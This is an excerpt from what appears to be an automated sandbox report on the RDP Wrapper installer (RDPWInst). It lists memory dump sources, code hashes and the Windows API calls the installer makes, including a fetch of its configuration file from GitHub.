                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileLibraryLoadModuleNamelstrcpynlstrlen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2912033995-0
                                                                                                                                                        • Opcode ID: 9b7ea9474c48fe3723e18e581a13ee0b38d21dda16a14f09b9e502bcf11d0e48
                                                                                                                                                        • Instruction ID: f6262d892358e01f8eacd9344567111696420312dcbdab07fa653b046a231d07
                                                                                                                                                        • Opcode Fuzzy Hash: 9b7ea9474c48fe3723e18e581a13ee0b38d21dda16a14f09b9e502bcf11d0e48
                                                                                                                                                        • Instruction Fuzzy Hash: 43114270A4421CABDB10EB51CD86BDD73B8DB04304F5144FBB509B72D1DA785E858A59
                                                                                                                                                        APIs
                                                                                                                                                        • GetFileAttributesW.KERNEL32(00000000,?,00447324,0043D527,00000000,0043D55E,?,00447324,0000000B,00000000,00000000,?,00443BAB,00000000,00443FB2), ref: 0040F788
                                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00447324,0043D527,00000000,0043D55E,?,00447324,0000000B,00000000,00000000,?,00443BAB,00000000,00443FB2), ref: 0040F79A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AttributesErrorFileLast
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1799206407-0
                                                                                                                                                        • Opcode ID: 27c98d3271cba15b76fb2ca257aef7b31123f3b10a7598d13b1c4fe8a3ea3e49
                                                                                                                                                        • Instruction ID: 8407d2a862a87125c88b0e9e376b57c3f61afd3adb54f06dd13a213247f2bd06
                                                                                                                                                        • Opcode Fuzzy Hash: 27c98d3271cba15b76fb2ca257aef7b31123f3b10a7598d13b1c4fe8a3ea3e49
                                                                                                                                                        • Instruction Fuzzy Hash: 5CE04F1732122016DD3530BC19CA6AB1244498B7A83280937FC51F3BD2D23E4D5B519F
                                                                                                                                                        APIs
                                                                                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004046DF
                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 004046E8
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorFileLastWrite
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 442123175-0
                                                                                                                                                        • Opcode ID: 1c195610d2d2e68796caa6713af8b8095328086dc3c63ffe84f07c697ca82352
                                                                                                                                                        • Instruction ID: 9545df1e08670e3e4372b9a2ed629c94f39af83de60d034ef920510406bc5815
                                                                                                                                                        • Opcode Fuzzy Hash: 1c195610d2d2e68796caa6713af8b8095328086dc3c63ffe84f07c697ca82352
                                                                                                                                                        • Instruction Fuzzy Hash: D1E092B16041106BDB54CE6A9980A6723CC9B89354F008877BA04EB282E2B9CC015776
                                                                                                                                                        APIs
                                                                                                                                                        • InterlockedCompareExchange.KERNEL32(00449DB0,00000001,00000000), ref: 00414644
                                                                                                                                                        • CloseHandle.KERNEL32(00000000,00449DB0,00000001,00000000,?,00449EB4,00414694,00449EB4,00000000,?,0041770A,00000000,00417872), ref: 00414651
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CloseCompareExchangeHandleInterlocked
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 190309047-0
                                                                                                                                                        • Opcode ID: 542c7fe3d3f03a500ed8d8709c7a3033507625bc89f5adea9d21179b445396bb
                                                                                                                                                        • Instruction ID: 63ce862fb254c7bb27cf93041dcda8475e179d55c14a8c261316d7a773b2a43f
                                                                                                                                                        • Opcode Fuzzy Hash: 542c7fe3d3f03a500ed8d8709c7a3033507625bc89f5adea9d21179b445396bb
                                                                                                                                                        • Instruction Fuzzy Hash: 3FD0A7F275172033DA2021A94DC1FAB014C8B9975CF015563BE44EF283D59CCC9102FC
                                                                                                                                                        APIs
                                                                                                                                                        • RegFlushKey.ADVAPI32(00010000,004375FC,004388B7,004375FC,00000001,004387C6,?,00447324,0043A802,00000000,0043AA55,?,?,00447324,00000000,00000000), ref: 00438871
                                                                                                                                                        • RegCloseKey.ADVAPI32(00010000,004375FC,004388B7,004375FC,00000001,004387C6,?,00447324,0043A802,00000000,0043AA55,?,?,00447324,00000000,00000000), ref: 0043887A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CloseFlush
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 320916635-0
                                                                                                                                                        • Opcode ID: 610934545e47d1af713ada86b5371c3a5aace2d80b4164f12a0993911e23d539
                                                                                                                                                        • Instruction ID: 02ceb0405e4d458188627afd9845f8495605ad087acfb065aa2a027a14818eba
                                                                                                                                                        • Opcode Fuzzy Hash: 610934545e47d1af713ada86b5371c3a5aace2d80b4164f12a0993911e23d539
                                                                                                                                                        • Instruction Fuzzy Hash: 8DE0ECA1B003008ADF64FF7684C4A12B6D86F48304B48D4BAB808DE14BDA3CD4109725
                                                                                                                                                        APIs
                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00438CCF,?,?,?,00000000), ref: 00438B85
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Open
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 71445658-0
                                                                                                                                                        • Opcode ID: a46219772db8ce53a9de16e33fdee055c61f0647121e37f1090d2be0f08d93d7
                                                                                                                                                        • Instruction ID: 89278caf5ef83198d89b8dc4a9c9fb76eb3a10e2e46a05883e0df08903897f1a
                                                                                                                                                        • Opcode Fuzzy Hash: a46219772db8ce53a9de16e33fdee055c61f0647121e37f1090d2be0f08d93d7
                                                                                                                                                        • Instruction Fuzzy Hash: C921D370B04344AFDB11EB65C842B9EF7F99B48304F2144BEB804E3282DA7C9E059758
                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,0000020A), ref: 004083CE
                                                                                                                                                          • Part of subcall function 0040920C: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,004092C6,?,?,00000000), ref: 00409248
                                                                                                                                                          • Part of subcall function 0040920C: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,004092C6,?,?,00000000), ref: 00409299
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileModuleName$LibraryLoad
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4113206344-0
                                                                                                                                                        • Opcode ID: cbb02fdfb2fa808f830c388f18c69e1a99260115120f30c524f5d5f327a3d354
                                                                                                                                                        • Instruction ID: 90d1829834ce79f86c13b7573f8e9a8c333b05ddd33e28dd31ebb7d28ab9999b
                                                                                                                                                        • Opcode Fuzzy Hash: cbb02fdfb2fa808f830c388f18c69e1a99260115120f30c524f5d5f327a3d354
                                                                                                                                                        • Instruction Fuzzy Hash: 84E0C9B1A003109BCB10DE58C9C5A477798AB48764F044AAAED64EF387D775DD1087D5
                                                                                                                                                        APIs
                                                                                                                                                        • CreateFileW.KERNEL32(00000000,C0000000,?,00000000,00000002,00000080,00000000,?,?,004257A8,0042F5F0,00000000,0042F6D7,?,?,004257A8), ref: 0040F68A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                        • Opcode ID: 09450458b8d81176c6a50bac5932f2701a5404c96287c680bb229262f5fe89b5
                                                                                                                                                        • Instruction ID: 32e31081b98e7b24079041a639207f5f8240b3ca2c27c4b0157ee02f81a1b514
                                                                                                                                                        • Opcode Fuzzy Hash: 09450458b8d81176c6a50bac5932f2701a5404c96287c680bb229262f5fe89b5
                                                                                                                                                        • Instruction Fuzzy Hash: 99E0C2A3B4072036F63072AD4C82FAB9158CB867B4F470336FA50FB2D2C0999C0241AC
                                                                                                                                                        APIs
                                                                                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040F6D4
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileWrite
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3934441357-0
                                                                                                                                                        • Opcode ID: 8e9fea90e53bca7412c33d02f8e097722a35645c54a93293cf713adbfc77c375
                                                                                                                                                        • Instruction ID: 3fe4e569543b3f1381ab86603454923b4de8c4718f21568c98d02def12c07fd2
                                                                                                                                                        • Opcode Fuzzy Hash: 8e9fea90e53bca7412c33d02f8e097722a35645c54a93293cf713adbfc77c375
                                                                                                                                                        • Instruction Fuzzy Hash: 42D05BB63082507AD220D55B5C44DAB6BDCDBC5771F10063FB658C31C0D6308C05C275
                                                                                                                                                        APIs
                                                                                                                                                        • GetNativeSystemInfo.KERNEL32 ref: 0043A648
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InfoNativeSystem
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1721193555-0
                                                                                                                                                        • Opcode ID: f537996a7b7980d49ed43dd1d2441830a107cc63a0e7000c4f47f7a03b218ad6
                                                                                                                                                        • Instruction ID: fbf5644ea725b9a19c2d11835783dba3dfebd9b236010a27cc61b97838af9c82
                                                                                                                                                        • Opcode Fuzzy Hash: f537996a7b7980d49ed43dd1d2441830a107cc63a0e7000c4f47f7a03b218ad6
                                                                                                                                                        • Instruction Fuzzy Hash: 66E086584BC14148C60523354C2F7A32688832A324F4D2923C4D985262E25FC0B77BAF
                                                                                                                                                        APIs
                                                                                                                                                        • GetFileAttributesW.KERNEL32(00000000,00447324,0043D137,00000000,0043D55E,?,00447324,0000000B,00000000,00000000,?,00443BAB,00000000,00443FB2), ref: 0040F7CF
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                        • Opcode ID: b551f2b18252a583477f9e8ccff1f7da88027c1fc4d2758f3b89c6edbf41f201
                                                                                                                                                        • Instruction ID: dfbd20c989cc919aa742ea809a195094cafabb968b5a4f056a7cb7a67f60922a
                                                                                                                                                        • Opcode Fuzzy Hash: b551f2b18252a583477f9e8ccff1f7da88027c1fc4d2758f3b89c6edbf41f201
                                                                                                                                                        • Instruction Fuzzy Hash: F3C08CA03012000AEE30B1BD1DCA80B02884A0D2383A02A37F069F3AD3D23E886F201A
                                                                                                                                                        APIs
                                                                                                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000001,0040F8C6,00000000,0040F8EB,?,00447324,00000000,00000000,00000000,00000000,?,0043D15F,00000000,0043D55E), ref: 0040FB69
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateDirectory
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4241100979-0
                                                                                                                                                        • Opcode ID: 93014c2a0d15a9f7c19c06a67ffa09c9f03b47d74489f26678219aaa478409b4
                                                                                                                                                        • Instruction ID: 5428b92e23564d17d1f876684be8f9c2b3243abbeaf0de8523baba27188e832a
                                                                                                                                                        • Opcode Fuzzy Hash: 93014c2a0d15a9f7c19c06a67ffa09c9f03b47d74489f26678219aaa478409b4
                                                                                                                                                        • Instruction Fuzzy Hash: 40B092927543401AEA0035FA0CC6F2A418CD70960AF110C3ABA42E7183D47FC8290026
                                                                                                                                                        APIs
                                                                                                                                                        • lstrcpynW.KERNEL32(?,00000000,?,00000000,004093AD,?,?,?,00000000), ref: 0040937A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: lstrcpyn
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 97706510-0
                                                                                                                                                        • Opcode ID: f92199f7e57e2128dd250d54d35a9e3758d953fbac64912c85fa78ba761ebe9f
                                                                                                                                                        • Instruction ID: 1f383253a52e48d77bc15eb4822a33d834d352bf49a326ca98ed7cc47a11fc89
                                                                                                                                                        • Opcode Fuzzy Hash: f92199f7e57e2128dd250d54d35a9e3758d953fbac64912c85fa78ba761ebe9f
                                                                                                                                                        • Instruction Fuzzy Hash: 0111C671504204EFDF21DB69CC86B9A77F8EB19754F5100BAFC40AB2D2D7B8AD008A19
                                                                                                                                                        APIs
                                                                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00402AE3
                                                                                                                                                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00402B06
                                                                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,?,0000001C), ref: 00402B13
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796193785.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796216870.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796232031.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796269619.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        • Associated: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RDPWInst.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Virtual$Free$Query
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 778034434-0
                                                                                                                                                        • Opcode ID: d2902ee949b2c85551e00087902fb7701d80a0372c0c987194a01e681a746040
                                                                                                                                                        • Instruction ID: e8ddcf902efd7f78c833b1da2340b8221ccc6e4d64c13544335dcfda98f803ee
                                                                                                                                                        • Opcode Fuzzy Hash: d2902ee949b2c85551e00087902fb7701d80a0372c0c987194a01e681a746040
                                                                                                                                                        • Instruction Fuzzy Hash: 0CF06D343046005FD311CB19CA89B17BBE5EFC9350F15C17AE988973E5E675DC019B9A
                                                                                                                                                        APIs
                                                                                                                                                        • InternetOpenW.WININET(RDP Wrapper Update,00000000,00000000,00000000,00000000), ref: 0043CF9B
                                                                                                                                                        • InternetOpenUrlW.WININET(00000000,https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.ini,00000000,00000000,80000000,00000000), ref: 0043CFB7
                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0043CFC3
                                                                                                                                                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0043CFDB
                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0043D002
                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0043D008
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000009.00000002.1796118654.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
